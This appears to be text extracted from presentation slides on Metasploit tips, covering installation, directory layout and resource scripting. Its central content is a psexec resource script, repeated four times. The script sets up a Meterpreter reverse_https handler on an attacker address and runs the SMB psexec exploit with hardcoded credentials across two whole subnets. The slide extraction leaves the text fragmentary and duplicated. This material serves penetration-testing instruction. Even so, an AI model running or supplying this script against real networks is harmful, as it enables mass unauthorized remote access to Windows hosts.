metasploit magic the dark coners of the framework

Metasploit MagicA little sleight of hand

But first...

Installing Metasploit

svn co https://metasploit.com/svn/trunk msf

not.. here

ESPECIALLY not here

it is a SYN

SRSLY!

here is ok ;-)

and remember...

this isn’t the only place you can install it...

Directory StructureHACKING

documentation

msfconsole

msfgui

msfpescan

tools

bins

external

lib

msfd

msfmachscan

msfrpc

plugins

scripts

README

modules

msfelfscan

msfopcode

msfrpcd

psexec.rc

armitage

data

msfcli

msfencode

msfpayload

msfupdate

~/.msf3/

• history, logs, loot

• msfconsole.rc

• YOUR SETTINGS

• modules

• YOUR MODULES

resource files

line by line script

can understand ruby

for meterpreter sessions now!

./msfconsole -r psexec.rc

msf> resource psexec.rc

psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !

psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !

psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !

psexec scanneruse multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z !use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true !<ruby> !require 'rex/socket/range_walker' !rhosts = '10.10.10.0/24,10.10.14.0/24' !iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> !

magic

• user .*psexec

other fun...

• script

• color = false

• screen

meterpreter>guid

• twitter.com/mubix

• mubix[hak5.org]